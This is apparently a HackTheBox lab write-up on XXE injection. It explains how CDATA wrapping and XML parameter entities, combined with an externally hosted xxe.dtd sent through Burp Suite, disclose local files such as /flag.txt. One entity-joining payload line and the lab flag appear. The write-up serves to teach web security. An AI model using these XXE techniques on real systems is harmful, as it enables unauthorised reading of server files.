avatarHuy Phu

Summary

The article discusses advanced techniques for local file disclosure in web applications using XXE (XML External Entity) Injection, applicable to non-PHP applications, and demonstrates how to exfiltrate data using CDATA and XML Parameter Entities.

Abstract

The author of the blog post previously covered how to exploit XXE Injection vulnerabilities to read local files on a target machine, specifically in PHP-based web applications. In this follow-up post, the author addresses the challenge of applying similar techniques to non-PHP applications. The article introduces an advanced method for local file disclosure that involves wrapping file content within a CDATA tag to bypass XML formatting restrictions. It also explains the concept of XML Parameter Entities, which are defined within a DTD (Document Type Definition) and can be used to reference external entities, such as files on an attacking machine. The post provides a step-by-step guide on how to exploit the vulnerability using Burp Suite, detailing how to inject a payload that references an externally hosted xxe.dtd file. This file contains parameter entities that, when combined, allow for the exfiltration of file contents, including sensitive information like flags stored in /flag.txt. The technique is demonstrated with screenshots, and the article concludes with the successful retrieval of the flag, showcasing the practical application of the described method.

Opinions

  • The author believes that XXE Injection is a powerful attack vector that can be adapted to various web application environments, not just PHP.
  • There is an emphasis on the versatility of XML Parameter Entities for data exfiltration, highlighting their ability to bypass certain security measures.
  • The author suggests that the use of Burp Suite is an effective way to test and exploit XXE vulnerabilities, indicating a preference for this tool among security professionals.
  • The inclusion of practical examples and screenshots reflects the author's view that hands-on demonstrations are valuable for understanding complex security concepts.
  • By providing a specific example of obtaining a flag from /flag.txt, the author implies that these techniques are directly applicable to penetration testing scenarios, such as those encountered on platforms like HackTheBox.

HackTheBox — Web Attacks: From XXE Injection to Advanced Local File Disclosure

In my previous blog post, HackTheBox — Web Attacks: From XXE Injection to Local File Disclosure, I went over how to use XXE Injection to read local files from the target machine. However, the technique used from the post is only applicable to web applications that use PHP. What happens if the target application does not use PHP? This blog post will go over another technique used to disclose local files.

To output data that does not conform to the XML format, we can wrap the content of the external file reference with a CDATA tag (e.g. <![CDATA[ FILE_CONTENT ]]>). This way, the XML parser would consider this part raw data, which may contain any type of data, including any special characters.

Advanced Exfiltration with CDATA

XML Parameter Entities

This is a special type of entity that starts with a % character and can only be used within the DTD (Document Type Definition). What's unique about parameter entities is that if we reference them from an external source (e.g., our own server), then all of them would be considered as external and can be joined, as follows:

<!ENTITY joined "%begin;%file;%end;">

We can store this in an xxe.dtd file that is hosted on attacking machine.

Exploit the vulnerability

In Burp Suite, inject the XML entity payload that references to the xxe.dtd file hosted on attacking machine

From the above screenshot: (1) — prepend the beginning of the CDATA tag (2) — reference external file (3) — append the end of the CDATA tag (4) — reference our external DTD (5) — reference the &joined; entity to print the file content

Once we send the request, we get the response on the right side, which displays the content of the requested file.

Using the same technique, we can obtain the flag in the /flag.txt

HTB{3rr0r5_c4n_l34k_d474}

Hackthebox
Bug Bounty
Web Security
Xxe Attack
Owasp Top 10
Recommended from ReadMedium
avatarKarthikeyan Nagaraj
20 Simple Bug Bounty Automation Techniques

How to Automate Bug Hunting and Improve Efficiency in Bug Bounty Programs

4 min read
avatarSadra Bakhtiari
Don’t miss this while working on a bounty target!

Hi, welcome to a new write-up!

3 min read
avatarKrish_cyber
💥 How I Discovered a Stored XSS Vulnerability in JS Files 🚀

A Journey Through Code, Curiosity, and the World of Web Security 🔍✨

3 min read
avatarSıla Özeren
Bug Bounty in 2025: Part 3 — Investigating 4 Open Redirect Reports at HackerOne, So You Don’t Have…

In this blog, I personally investigated 4 disclosed and triaged open redirect bug bounty reports to understand what kinds of open redirect…

5 min read
avatarRendiero
How to Find XSS Vulnerabilities in React JS Websites

Learn how to identify XSS vulnerabilities in React JS applications. Practical tips and coding examples included!

3 min read
avatarAbhijeet Kumawat
🚀How I Found an Open Redirect Vulnerability Easily (Worth $500!)

🚀Free Article Link

2 min read